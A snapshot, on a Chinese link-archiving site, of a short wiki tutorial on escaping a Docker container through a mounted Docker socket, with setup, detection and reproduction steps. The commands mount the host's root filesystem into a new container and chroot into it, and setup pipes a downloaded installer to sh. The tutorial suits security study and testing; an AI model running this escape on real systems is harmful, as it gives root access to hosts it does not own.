添加链接 注册    登录
link管理
链接快照平台
  • 输入网页链接,自动生成快照
  • 标签化管理网页链接
相关文章推荐
气势凌人的柚子  ·  Dockerfile 的 ...·  1小时前    · 
奔跑的路灯  ·  Dockerfile最佳实践【原创、很多实践 ...·  1小时前    · 
可爱的勺子  ·  Dockerfile 常用命令 — 董仁文的博客·  1小时前    · 
悲伤的山羊  ·  Docker中的ENTRYPOINT与CMD ...·  1小时前    · 
淡定的金鱼  ·  好好学Docker:Dockerfile中的 ...·  1小时前    · 
狂野的火车  ·  Access Denied·  1 月前    · 
成熟的烤地瓜  ·  【权力的游戏 ...·  5 月前    · 
无邪的单杠  ·  19年前的今天,艾弗森一战封神 - 知乎·  8 月前    · 
不羁的盒饭  ·  vb.net访问sql ...·  10 月前    · 
微醺的大象  ·  【Pre order】SZDMM ...·  11 月前    · 
link管理  ›  挂载 Docker Socket 逃逸 | T Wiki
docker命令 docker
https://wiki.teamssix.com/cloudnative/docker/docker-socket-escape
仗义的楼房
15 小时前

挂载 Docker Socket 逃逸

Docker Socket 用来与守护进程通信即查询信息或者下发命令。

# 搭建

创建一个容器并挂载 /var/run/docker/sock 文件 

docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu
1

在容器内安装 Docker 命令行客户端 

docker exec -it with_docker_sock /bin/bash
apt-get update
apt-get install curl
curl -fsSL https://get.docker.com/ | sh
1
2
3
4

# 检测 

ls -lah /var/run/docker.sock
1

如果存在这个文件,说明漏洞可能存在

# 复现

在容器内部创建一个新的容器,并将宿主机目录挂载到新的容器内部 

docker run -it -v /:/host ubuntu /bin/bash
1

在新的容器内执行 chroot,将根目录切换到挂载到宿主机的根目录,其实不挂载也行 

chroot /host
1

 
推荐文章
气势凌人的柚子  ·  Dockerfile 的 ENTRYPOINT 与 CMD - 张志敏的技术专栏
1小时前
奔跑的路灯  ·  Dockerfile最佳实践【原创、很多实践经验】 | Zollty's Blog
1小时前
可爱的勺子  ·  Dockerfile 常用命令 — 董仁文的博客
1小时前
悲伤的山羊  ·  Docker中的ENTRYPOINT与CMD · 零壹軒·笔记
1小时前
淡定的金鱼  ·  好好学Docker:Dockerfile中的CMD和ENTRYPOINT | 好好学习的郝
1小时前
狂野的火车  ·  Access Denied
1 月前
成熟的烤地瓜  ·  【权力的游戏 01】龙妈主线(未删减)完整版解说第一季_哔哩哔哩_bilibili
5 月前
无邪的单杠  ·  19年前的今天,艾弗森一战封神 - 知乎
8 月前
不羁的盒饭  ·  vb.net访问sql server数据库(SqlDataReader和DataSet两种方式) - yanlutian - 博客园
10 月前
微醺的大象  ·  【Pre order】SZDMM Studio Genshin Impact R18 Arataki Itto 1/6 Resin Statue
11 月前
Link管理   ·   51好读   ·   Sov5搜索   ·   小百科
link管理 - 链接快照平台